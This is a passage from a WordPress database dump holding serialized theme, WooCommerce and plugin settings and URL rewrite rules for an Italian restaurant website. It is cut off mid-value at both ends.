ackground_color\";s:7:\"#f5f7f8\";s:20:\"blog_list_grid_space\";s:4:\"huge\";s:14:\"blog_list_type\";s:8:\"standard\";s:22:\"archive_sidebar_layout\";s:10:\"no-sidebar\";s:27:\"archive_custom_sidebar_area\";s:0:\"\";s:19:\"blog_masonry_layout\";s:7:\"in-grid\";s:30:\"blog_masonry_number_of_columns\";s:5:\"three\";s:32:\"blog_masonry_space_between_items\";s:6:\"normal\";s:35:\"blog_list_featured_image_proportion\";s:5:\"fixed\";s:20:\"blog_pagination_type\";s:8:\"standard\";s:15:\"number_of_chars\";s:2:\"40\";s:19:\"show_tags_area_blog\";s:2:\"no\";s:21:\"blog_predefined_style\";s:3:\"yes\";s:22:\"blog_single_grid_space\";s:4:\"huge\";s:26:\"blog_single_sidebar_layout\";s:16:\"sidebar-25-right\";s:31:\"blog_single_custom_sidebar_area\";s:0:\"\";s:20:\"show_title_area_blog\";s:0:\"\";s:31:\"blog_single_title_in_title_area\";s:2:\"no\";s:26:\"blog_single_comment_avatar\";s:2:\"no\";s:25:\"blog_single_related_posts\";s:2:\"no\";s:20:\"blog_single_comments\";s:3:\"yes\";s:22:\"blog_single_navigation\";s:3:\"yes\";s:37:\"blog_navigation_through_same_category\";s:2:\"no\";s:16:\"blog_author_info\";s:3:\"yes\";s:22:\"blog_author_info_email\";s:2:\"no\";s:25:\"blog_single_author_social\";s:2:\"no\";s:33:\"portfolio_archive_number_of_items\";s:0:\"\";s:35:\"portfolio_archive_number_of_columns\";s:4:\"four\";s:37:\"portfolio_archive_space_between_items\";s:6:\"normal\";s:28:\"portfolio_archive_image_size\";s:9:\"landscape\";s:29:\"portfolio_archive_item_layout\";s:15:\"standard-shader\";s:25:\"portfolio_single_template\";s:12:\"small-images\";s:39:\"portfolio_single_gallery_columns_number\";s:5:\"three\";s:44:\"portfolio_single_gallery_space_between_items\";s:6:\"normal\";s:39:\"portfolio_single_masonry_columns_number\";s:5:\"three\";s:44:\"portfolio_single_masonry_space_between_items\";s:6:\"normal\";s:32:\"show_title_area_portfolio_single\";s:0:\"\";s:32:\"portfolio_single_lightbox_images\";s:3:\"yes\";s:32:\"portfolio_single_lightbox_videos\";s:2:\"no\";s:34:\"portfolio_single_enable_categories\";s:3:\"yes\";s:26:\"portfolio_single_hide_date\";s:3:\"yes\";s:31:\"portfolio_single_sticky_sidebar\";s:3:\"yes\";s:25:\"portfolio_single_comments\";s:2:\"no\";s:32:\"portfolio_single_hide_pagination\";s:3:\"yes\";s:34:\"portfolio_single_nav_same_category\";s:2:\"no\";s:21:\"portfolio_single_slug\";s:0:\"\";s:22:\"enable_subscribe_popup\";s:2:\"no\";s:21:\"subscribe_popup_title\";s:0:\"\";s:24:\"subscribe_popup_subtitle\";s:0:\"\";s:32:\"subscribe_popup_background_image\";s:0:\"\";s:28:\"subscribe_popup_contact_form\";s:0:\"\";s:34:\"subscribe_popup_contact_form_style\";s:0:\"\";s:30:\"enable_subscribe_popup_prevent\";s:3:\"yes\";s:32:\"subscribe_popup_prevent_behavior\";s:0:\"\";s:19:\"enable_social_share\";s:3:\"yes\";s:27:\"enable_social_share_on_post\";s:3:\"yes\";s:27:\"enable_social_share_on_page\";s:2:\"no\";s:37:\"enable_social_share_on_portfolio_item\";s:3:\"yes\";s:30:\"enable_social_share_on_product\";s:3:\"yes\";s:21:\"enable_facebook_share\";s:3:\"yes\";s:13:\"facebook_icon\";s:0:\"\";s:20:\"enable_twitter_share\";s:3:\"yes\";s:12:\"twitter_icon\";s:0:\"\";s:11:\"twitter_via\";s:0:\"\";s:24:\"enable_google_plus_share\";s:2:\"no\";s:16:\"google_plus_icon\";s:0:\"\";s:21:\"enable_linkedin_share\";s:2:\"no\";s:13:\"linkedin_icon\";s:0:\"\";s:19:\"enable_tumblr_share\";s:2:\"no\";s:11:\"tumblr_icon\";s:0:\"\";s:22:\"enable_pinterest_share\";s:3:\"yes\";s:14:\"pinterest_icon\";s:0:\"\";s:15:\"enable_vk_share\";s:2:\"no\";s:7:\"vk_icon\";s:0:\"\";s:17:\"enable_open_graph\";s:2:\"no\";s:16:\"open_graph_image\";s:83:\"https://www.ristorantesolymar.it/wp-content/themes/attika/assets/img/open_graph.jpg\";s:37:\"404_menu_area_background_color_header\";s:0:\"\";s:44:\"404_menu_area_background_transparency_header\";s:0:\"\";s:33:\"404_menu_area_border_color_header\";s:0:\"\";s:16:\"404_header_style\";s:0:\"\";s:25:\"404_page_background_color\";s:0:\"\";s:25:\"404_page_background_image\";s:0:\"\";s:33:\"404_page_background_pattern_image\";s:0:\"\";s:20:\"404_page_title_image\";s:0:\"\";s:9:\"404_title\";s:0:\"\";s:15:\"404_title_color\";s:0:\"\";s:22:\"404_title_google_fonts\";s:2:\"-1\";s:19:\"404_title_font_size\";s:0:\"\";s:21:\"404_title_line_height\";s:0:\"\";s:20:\"404_title_font_style\";s:0:\"\";s:21:\"404_title_font_weight\";s:0:\"\";s:24:\"404_title_letter_spacing\";s:0:\"\";s:24:\"404_title_text_transform\";s:0:\"\";s:30:\"404_title_responsive_font_size\";s:0:\"\";s:32:\"404_title_responsive_line_height\";s:0:\"\";s:35:\"404_title_responsive_letter_spacing\";s:0:\"\";s:12:\"404_subtitle\";s:0:\"\";s:18:\"404_subtitle_color\";s:0:\"\";s:25:\"404_subtitle_google_fonts\";s:2:\"-1\";s:22:\"404_subtitle_font_size\";s:0:\"\";s:24:\"404_subtitle_line_height\";s:0:\"\";s:23:\"404_subtitle_font_style\";s:0:\"\";s:24:\"404_subtitle_font_weight\";s:0:\"\";s:27:\"404_subtitle_letter_spacing\";s:0:\"\";s:27:\"404_subtitle_text_transform\";s:0:\"\";s:33:\"404_subtitle_responsive_font_size\";s:0:\"\";s:35:\"404_subtitle_responsive_line_height\";s:0:\"\";s:38:\"404_subtitle_responsive_letter_spacing\";s:0:\"\";s:8:\"404_text\";s:0:\"\";s:14:\"404_text_color\";s:0:\"\";s:21:\"404_text_google_fonts\";s:2:\"-1\";s:18:\"404_text_font_size\";s:0:\"\";s:20:\"404_text_line_height\";s:0:\"\";s:19:\"404_text_font_style\";s:0:\"\";s:20:\"404_text_font_weight\";s:0:\"\";s:23:\"404_text_letter_spacing\";s:0:\"\";s:23:\"404_text_text_transform\";s:0:\"\";s:29:\"404_text_responsive_font_size\";s:0:\"\";s:31:\"404_text_responsive_line_height\";s:0:\"\";s:34:\"404_text_responsive_letter_spacing\";s:0:\"\";s:16:\"404_back_to_home\";s:0:\"\";s:16:\"404_button_style\";s:0:\"\";s:22:\"cf7_style_1_text_color\";s:0:\"\";s:28:\"cf7_style_1_focus_text_color\";s:0:\"\";s:26:\"cf7_style_1_text_font_size\";s:0:\"\";s:28:\"cf7_style_1_text_line_height\";s:0:\"\";s:29:\"cf7_style_1_text_google_fonts\";s:0:\"\";s:27:\"cf7_style_1_text_font_style\";s:0:\"\";s:28:\"cf7_style_1_text_font_weight\";s:0:\"\";s:31:\"cf7_style_1_text_text_transform\";s:0:\"\";s:31:\"cf7_style_1_text_letter_spacing\";s:0:\"\";s:23:\"cf7_style_1_label_color\";s:0:\"\";s:27:\"cf7_style_1_label_font_size\";s:0:\"\";s:29:\"cf7_style_1_label_line_height\";s:0:\"\";s:30:\"cf7_style_1_label_google_fonts\";s:0:\"\";s:28:\"cf7_style_1_label_font_style\";s:0:\"\";s:29:\"cf7_style_1_label_font_weight\";s:0:\"\";s:32:\"cf7_style_1_label_text_transform\";s:0:\"\";s:32:\"cf7_style_1_label_letter_spacing\";s:0:\"\";s:28:\"cf7_style_1_background_color\";s:0:\"\";s:35:\"cf7_style_1_background_transparency\";s:0:\"\";s:34:\"cf7_style_1_focus_background_color\";s:0:\"\";s:41:\"cf7_style_1_focus_background_transparency\";s:0:\"\";s:24:\"cf7_style_1_border_color\";s:0:\"\";s:31:\"cf7_style_1_border_transparency\";s:0:\"\";s:30:\"cf7_style_1_focus_border_color\";s:0:\"\";s:37:\"cf7_style_1_focus_border_transparency\";s:0:\"\";s:24:\"cf7_style_1_border_width\";s:0:\"\";s:25:\"cf7_style_1_border_radius\";s:0:\"\";s:23:\"cf7_style_1_padding_top\";s:0:\"\";s:25:\"cf7_style_1_padding_right\";s:0:\"\";s:26:\"cf7_style_1_padding_bottom\";s:0:\"\";s:24:\"cf7_style_1_padding_left\";s:0:\"\";s:22:\"cf7_style_1_margin_top\";s:0:\"\";s:25:\"cf7_style_1_margin_bottom\";s:0:\"\";s:27:\"cf7_style_1_textarea_height\";s:0:\"\";s:24:\"cf7_style_1_button_color\";s:0:\"\";s:30:\"cf7_style_1_button_hover_color\";s:0:\"\";s:28:\"cf7_style_1_button_font_size\";s:0:\"\";s:31:\"cf7_style_1_button_google_fonts\";s:0:\"\";s:29:\"cf7_style_1_button_font_style\";s:0:\"\";s:30:\"cf7_style_1_button_font_weight\";s:0:\"\";s:33:\"cf7_style_1_button_text_transform\";s:0:\"\";s:33:\"cf7_style_1_button_letter_spacing\";s:0:\"\";s:35:\"cf7_style_1_button_background_color\";s:0:\"\";s:42:\"cf7_style_1_button_background_transparency\";s:0:\"\";s:35:\"cf7_style_1_button_hover_bckg_color\";s:0:\"\";s:42:\"cf7_style_1_button_hover_bckg_transparency\";s:0:\"\";s:31:\"cf7_style_1_button_border_color\";s:0:\"\";s:38:\"cf7_style_1_button_border_transparency\";s:0:\"\";s:37:\"cf7_style_1_button_hover_border_color\";s:0:\"\";s:44:\"cf7_style_1_button_hover_border_transparency\";s:0:\"\";s:31:\"cf7_style_1_button_border_width\";s:0:\"\";s:32:\"cf7_style_1_button_border_radius\";s:0:\"\";s:25:\"cf7_style_1_button_height\";s:0:\"\";s:26:\"cf7_style_1_button_padding\";s:0:\"\";s:22:\"cf7_style_2_text_color\";s:0:\"\";s:28:\"cf7_style_2_focus_text_color\";s:0:\"\";s:26:\"cf7_style_2_text_font_size\";s:0:\"\";s:28:\"cf7_style_2_text_line_height\";s:0:\"\";s:29:\"cf7_style_2_text_google_fonts\";s:0:\"\";s:27:\"cf7_style_2_text_font_style\";s:0:\"\";s:28:\"cf7_style_2_text_font_weight\";s:0:\"\";s:31:\"cf7_style_2_text_text_transform\";s:0:\"\";s:31:\"cf7_style_2_text_letter_spacing\";s:0:\"\";s:23:\"cf7_style_2_label_color\";s:0:\"\";s:27:\"cf7_style_2_label_font_size\";s:0:\"\";s:29:\"cf7_style_2_label_line_height\";s:0:\"\";s:30:\"cf7_style_2_label_google_fonts\";s:0:\"\";s:28:\"cf7_style_2_label_font_style\";s:0:\"\";s:29:\"cf7_style_2_label_font_weight\";s:0:\"\";s:32:\"cf7_style_2_label_text_transform\";s:0:\"\";s:32:\"cf7_style_2_label_letter_spacing\";s:0:\"\";s:28:\"cf7_style_2_background_color\";s:0:\"\";s:35:\"cf7_style_2_background_transparency\";s:0:\"\";s:34:\"cf7_style_2_focus_background_color\";s:0:\"\";s:41:\"cf7_style_2_focus_background_transparency\";s:0:\"\";s:24:\"cf7_style_2_border_color\";s:0:\"\";s:31:\"cf7_style_2_border_transparency\";s:0:\"\";s:30:\"cf7_style_2_focus_border_color\";s:0:\"\";s:37:\"cf7_style_2_focus_border_transparency\";s:0:\"\";s:24:\"cf7_style_2_border_width\";s:0:\"\";s:25:\"cf7_style_2_border_radius\";s:0:\"\";s:23:\"cf7_style_2_padding_top\";s:0:\"\";s:25:\"cf7_style_2_padding_right\";s:0:\"\";s:26:\"cf7_style_2_padding_bottom\";s:0:\"\";s:24:\"cf7_style_2_padding_left\";s:0:\"\";s:22:\"cf7_style_2_margin_top\";s:0:\"\";s:25:\"cf7_style_2_margin_bottom\";s:0:\"\";s:27:\"cf7_style_2_textarea_height\";s:0:\"\";s:24:\"cf7_style_2_button_color\";s:0:\"\";s:30:\"cf7_style_2_button_hover_color\";s:0:\"\";s:28:\"cf7_style_2_button_font_size\";s:0:\"\";s:31:\"cf7_style_2_button_google_fonts\";s:0:\"\";s:29:\"cf7_style_2_button_font_style\";s:0:\"\";s:30:\"cf7_style_2_button_font_weight\";s:0:\"\";s:33:\"cf7_style_2_button_text_transform\";s:0:\"\";s:33:\"cf7_style_2_button_letter_spacing\";s:0:\"\";s:35:\"cf7_style_2_button_background_color\";s:0:\"\";s:42:\"cf7_style_2_button_background_transparency\";s:0:\"\";s:35:\"cf7_style_2_button_hover_bckg_color\";s:0:\"\";s:42:\"cf7_style_2_button_hover_bckg_transparency\";s:0:\"\";s:31:\"cf7_style_2_button_border_color\";s:0:\"\";s:38:\"cf7_style_2_button_border_transparency\";s:0:\"\";s:37:\"cf7_style_2_button_hover_border_color\";s:0:\"\";s:44:\"cf7_style_2_button_hover_border_transparency\";s:0:\"\";s:31:\"cf7_style_2_button_border_width\";s:0:\"\";s:32:\"cf7_style_2_button_border_radius\";s:0:\"\";s:25:\"cf7_style_2_button_height\";s:0:\"\";s:26:\"cf7_style_2_button_padding\";s:0:\"\";s:22:\"cf7_style_3_text_color\";s:0:\"\";s:28:\"cf7_style_3_focus_text_color\";s:0:\"\";s:26:\"cf7_style_3_text_font_size\";s:0:\"\";s:28:\"cf7_style_3_text_line_height\";s:0:\"\";s:29:\"cf7_style_3_text_google_fonts\";s:0:\"\";s:27:\"cf7_style_3_text_font_style\";s:0:\"\";s:28:\"cf7_style_3_text_font_weight\";s:0:\"\";s:31:\"cf7_style_3_text_text_transform\";s:0:\"\";s:31:\"cf7_style_3_text_letter_spacing\";s:0:\"\";s:23:\"cf7_style_3_label_color\";s:0:\"\";s:27:\"cf7_style_3_label_font_size\";s:0:\"\";s:29:\"cf7_style_3_label_line_height\";s:0:\"\";s:30:\"cf7_style_3_label_google_fonts\";s:0:\"\";s:28:\"cf7_style_3_label_font_style\";s:0:\"\";s:29:\"cf7_style_3_label_font_weight\";s:0:\"\";s:32:\"cf7_style_3_label_text_transform\";s:0:\"\";s:32:\"cf7_style_3_label_letter_spacing\";s:0:\"\";s:28:\"cf7_style_3_background_color\";s:0:\"\";s:35:\"cf7_style_3_background_transparency\";s:0:\"\";s:34:\"cf7_style_3_focus_background_color\";s:0:\"\";s:41:\"cf7_style_3_focus_background_transparency\";s:0:\"\";s:24:\"cf7_style_3_border_color\";s:0:\"\";s:31:\"cf7_style_3_border_transparency\";s:0:\"\";s:30:\"cf7_style_3_focus_border_color\";s:0:\"\";s:37:\"cf7_style_3_focus_border_transparency\";s:0:\"\";s:24:\"cf7_style_3_border_width\";s:0:\"\";s:25:\"cf7_style_3_border_radius\";s:0:\"\";s:23:\"cf7_style_3_padding_top\";s:0:\"\";s:25:\"cf7_style_3_padding_right\";s:0:\"\";s:26:\"cf7_style_3_padding_bottom\";s:0:\"\";s:24:\"cf7_style_3_padding_left\";s:0:\"\";s:22:\"cf7_style_3_margin_top\";s:0:\"\";s:25:\"cf7_style_3_margin_bottom\";s:0:\"\";s:27:\"cf7_style_3_textarea_height\";s:0:\"\";s:24:\"cf7_style_3_button_color\";s:0:\"\";s:30:\"cf7_style_3_button_hover_color\";s:0:\"\";s:28:\"cf7_style_3_button_font_size\";s:0:\"\";s:31:\"cf7_style_3_button_google_fonts\";s:0:\"\";s:29:\"cf7_style_3_button_font_style\";s:0:\"\";s:30:\"cf7_style_3_button_font_weight\";s:0:\"\";s:33:\"cf7_style_3_button_text_transform\";s:0:\"\";s:33:\"cf7_style_3_button_letter_spacing\";s:0:\"\";s:35:\"cf7_style_3_button_background_color\";s:0:\"\";s:42:\"cf7_style_3_button_background_transparency\";s:0:\"\";s:35:\"cf7_style_3_button_hover_bckg_color\";s:0:\"\";s:42:\"cf7_style_3_button_hover_bckg_transparency\";s:0:\"\";s:31:\"cf7_style_3_button_border_color\";s:0:\"\";s:38:\"cf7_style_3_button_border_transparency\";s:0:\"\";s:37:\"cf7_style_3_button_hover_border_color\";s:0:\"\";s:44:\"cf7_style_3_button_hover_border_transparency\";s:0:\"\";s:31:\"cf7_style_3_button_border_width\";s:0:\"\";s:32:\"cf7_style_3_button_border_radius\";s:0:\"\";s:25:\"cf7_style_3_button_height\";s:0:\"\";s:26:\"cf7_style_3_button_padding\";s:0:\"\";s:19:\"woo_list_grid_space\";s:4:\"huge\";s:29:\"mkdf_woo_product_list_columns\";s:26:\"mkdf-woocommerce-columns-2\";s:35:\"mkdf_woo_product_list_columns_space\";s:4:\"huge\";s:35:\"mkdf_woo_product_list_info_position\";s:16:\"info_below_image\";s:26:\"mkdf_woo_products_per_page\";s:2:\"12\";s:28:\"mkdf_products_list_title_tag\";s:1:\"p\";s:29:\"woo_enable_percent_sign_value\";s:2:\"no\";s:19:\"show_title_area_woo\";s:0:\"\";s:29:\"mkdf_single_product_title_tag\";s:2:\"h3\";s:26:\"woo_number_of_thumb_images\";s:1:\"4\";s:29:\"woo_set_thumb_images_position\";s:11:\"below-image\";s:36:\"woo_enable_single_product_zoom_image\";s:2:\"no\";s:30:\"woo_set_single_images_behavior\";s:12:\"pretty-photo\";s:33:\"mkdf_woo_related_products_columns\";s:26:\"mkdf-woocommerce-columns-3\";s:25:\"dropdown_cart_icon_source\";s:9:\"icon_pack\";s:23:\"dropdown_cart_icon_pack\";s:17:\"simple_line_icons\";s:27:\"dropdown_cart_icon_svg_path\";s:0:\"\";s:24:\"dropdown_cart_icon_color\";s:7:\"#111111\";s:25:\"dropdown_cart_hover_color\";s:7:\"#111111\";s:14:\"wh_monday_from\";s:5:\"12.00\";s:12:\"wh_monday_to\";s:5:\"14.30\";s:15:\"wh_tuesday_from\";s:0:\"\";s:13:\"wh_tuesday_to\";s:0:\"\";s:17:\"wh_wednesday_from\";s:0:\"\";s:15:\"wh_wednesday_to\";s:0:\"\";s:16:\"wh_thursday_from\";s:0:\"\";s:14:\"wh_thursday_to\";s:0:\"\";s:14:\"wh_friday_from\";s:0:\"\";s:12:\"wh_friday_to\";s:0:\"\";s:16:\"wh_saturday_from\";s:0:\"\";s:14:\"wh_saturday_to\";s:0:\"\";s:14:\"wh_sunday_from\";s:0:\"\";s:12:\"wh_sunday_to\";s:0:\"\";s:17:\"reset_to_defaults\";s:2:\"no\";s:20:\"mkdf_ajax_save_nonce\";s:10:\"779b2f131c\";s:16:\"_wp_http_referer\";s:64:\"/wp-admin/admin.php?page=attika_mikado_theme_menu_tab_restaurant\";s:23:\"woocommerce-login-nonce\";N;s:8:\"_wpnonce\";N;s:32:\"woocommerce-reset-password-nonce\";N;}','yes'),(286335,'wpb_js_composer_license_activation_notified','yes','yes'),(286354,'shop_isle_notice_dismissed_2','yes','yes'),(286355,'themeisle_sdk_notifications','a:2:{s:17:\"last_notification\";a:2:{s:2:\"id\";s:21:\"shop_isle_logger_flag\";s:10:\"display_at\";i:1607162188;}s:24:\"last_notification_active\";i:0;}','yes'),(286997,'mkdf_sidebars','a:6:{i:0;s:12:\"Shop Sidebar\";i:1;s:19:\"Shop Header Widgets\";i:2;s:9:\"left menu\";i:3;s:13:\"Custom Opener\";i:4;s:15:\"Logo Fullscreen\";i:5;s:13:\"Custom Sticky\";}','yes'),(286998,'widget_wp_user_avatar_profile','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(287057,'revslider_update_revision_current','6.2.0','yes'),(287799,'wpb_js_google_fonts_subsets','a:1:{i:0;s:5:\"latin\";}','yes'),(287800,'wpb_js_gutenberg_disable','1','yes'),(287801,'wpb_js_default_template_post_type','a:0:{}','yes'),(322978,'testimonials-category_children','a:0:{}','yes'),(322975,'category_children','a:0:{}','yes'),(322979,'restaurant-menu-category_children','a:0:{}','yes'),(322980,'product_cat_children','a:0:{}','yes'),(322976,'masonry-gallery-category_children','a:0:{}','yes'),(322977,'portfolio-category_children','a:1:{i:50;a:4:{i:0;i:52;i:1;i:54;i:2;i:56;i:3;i:60;}}','yes'),(331386,'rewrite_rules','a:348:{s:17:\"portfolio-item/?$\";s:34:\"index.php?post_type=portfolio-item\";s:47:\"portfolio-item/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?post_type=portfolio-item&feed=$matches[1]\";s:42:\"portfolio-item/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?post_type=portfolio-item&feed=$matches[1]\";s:34:\"portfolio-item/page/([0-9]{1,})/?$\";s:52:\"index.php?post_type=portfolio-item&paged=$matches[1]\";s:24:\"^wc-auth/v([1]{1})/(.*)?\";s:63:\"index.php?wc-auth-version=$matches[1]&wc-auth-route=$matches[2]\";s:22:\"^wc-api/v([1-3]{1})/?$\";s:51:\"index.php?wc-api-version=$matches[1]&wc-api-route=/\";s:24:\"^wc-api/v([1-3]{1})(.*)?\";s:61:\"index.php?wc-api-version=$matches[1]&wc-api-route=$matches[2]\";s:19:\"sitemap_index\\.xml$\";s:19:\"index.php?sitemap=1\";s:31:\"([^/]+?)-sitemap([0-9]+)?\\.xml$\";s:51:\"index.php?sitemap=$matches[1]&sitemap_n=$matches[2]\";s:24:\"([a-z]+)?-?sitemap\\.xsl$\";s:39:\"index.php?yoast-sitemap-xsl=$matches[1]\";s:10:\"negozio/?$\";s:27:\"index.php?post_type=product\";s:40:\"negozio/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=product&feed=$matches[1]\";s:35:\"negozio/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=product&feed=$matches[1]\";s:27:\"negozio/page/([0-9]{1,})/?$\";s:45:\"index.php?post_type=product&paged=$matches[1]\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:10:\"pt_view/?$\";s:27:\"index.php?post_type=pt_view\";s:40:\"pt_view/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=pt_view&feed=$matches[1]\";s:35:\"pt_view/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=pt_view&feed=$matches[1]\";s:27:\"pt_view/page/([0-9]{1,})/?$\";s:45:\"index.php?post_type=pt_view&paged=$matches[1]\";s:11:\"giftcard/?$\";s:28:\"index.php?post_type=giftcard\";s:41:\"giftcard/feed/(feed|rdf|rss|rss2|atom)/?$\";s:45:\"index.php?post_type=giftcard&feed=$matches[1]\";s:36:\"giftcard/(feed|rdf|rss|rss2|atom)/?$\";s:45:\"index.php?post_type=giftcard&feed=$matches[1]\";s:28:\"giftcard/page/([0-9]{1,})/?$\";s:46:\"index.php?post_type=giftcard&paged=$matches[1]\";s:43:\"masonry-gallery/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:53:\"masonry-gallery/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:73:\"masonry-gallery/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:68:\"masonry-gallery/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:68:\"masonry-gallery/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:49:\"masonry-gallery/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:32:\"masonry-gallery/([^/]+)/embed/?$\";s:48:\"index.php?masonry-gallery=$matches[1]&embed=true\";s:36:\"masonry-gallery/([^/]+)/trackback/?$\";s:42:\"index.php?masonry-gallery=$matches[1]&tb=1\";s:44:\"masonry-gallery/([^/]+)/page/?([0-9]{1,})/?$\";s:55:\"index.php?masonry-gallery=$matches[1]&paged=$matches[2]\";s:51:\"masonry-gallery/([^/]+)/comment-page-([0-9]{1,})/?$\";s:55:\"index.php?masonry-gallery=$matches[1]&cpage=$matches[2]\";s:41:\"masonry-gallery/([^/]+)/wc-api(/(.*))?/?$\";s:56:\"index.php?masonry-gallery=$matches[1]&wc-api=$matches[3]\";s:47:\"masonry-gallery/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:58:\"masonry-gallery/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:40:\"masonry-gallery/([^/]+)(?:/([0-9]+))?/?$\";s:54:\"index.php?masonry-gallery=$matches[1]&page=$matches[2]\";s:32:\"masonry-gallery/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:42:\"masonry-gallery/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:62:\"masonry-gallery/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"masonry-gallery/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"masonry-gallery/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"masonry-gallery/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:65:\"masonry-gallery-category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:63:\"index.php?masonry-gallery-category=$matches[1]&feed=$matches[2]\";s:60:\"masonry-gallery-category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:63:\"index.php?masonry-gallery-category=$matches[1]&feed=$matches[2]\";s:41:\"masonry-gallery-category/([^/]+)/embed/?$\";s:57:\"index.php?masonry-gallery-category=$matches[1]&embed=true\";s:53:\"masonry-gallery-category/([^/]+)/page/?([0-9]{1,})/?$\";s:64:\"index.php?masonry-gallery-category=$matches[1]&paged=$matches[2]\";s:35:\"masonry-gallery-category/([^/]+)/?$\";s:46:\"index.php?masonry-gallery-category=$matches[1]\";s:42:\"portfolio-item/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:52:\"portfolio-item/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:72:\"portfolio-item/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"portfolio-item/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"portfolio-item/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:48:\"portfolio-item/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:31:\"portfolio-item/([^/]+)/embed/?$\";s:47:\"index.php?portfolio-item=$matches[1]&embed=true\";s:35:\"portfolio-item/([^/]+)/trackback/?$\";s:41:\"index.php?portfolio-item=$matches[1]&tb=1\";s:55:\"portfolio-item/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:53:\"index.php?portfolio-item=$matches[1]&feed=$matches[2]\";s:50:\"portfolio-item/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:53:\"index.php?portfolio-item=$matches[1]&feed=$matches[2]\";s:43:\"portfolio-item/([^/]+)/page/?([0-9]{1,})/?$\";s:54:\"index.php?portfolio-item=$matches[1]&paged=$matches[2]\";s:50:\"portfolio-item/([^/]+)/comment-page-([0-9]{1,})/?$\";s:54:\"index.php?portfolio-item=$matches[1]&cpage=$matches[2]\";s:40:\"portfolio-item/([^/]+)/wc-api(/(.*))?/?$\";s:55:\"index.php?portfolio-item=$matches[1]&wc-api=$matches[3]\";s:46:\"portfolio-item/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:57:\"portfolio-item/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:39:\"portfolio-item/([^/]+)(?:/([0-9]+))?/?$\";s:53:\"index.php?portfolio-item=$matches[1]&page=$matches[2]\";s:31:\"portfolio-item/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:41:\"portfolio-item/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:61:\"portfolio-item/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"portfolio-item/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"portfolio-item/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$ma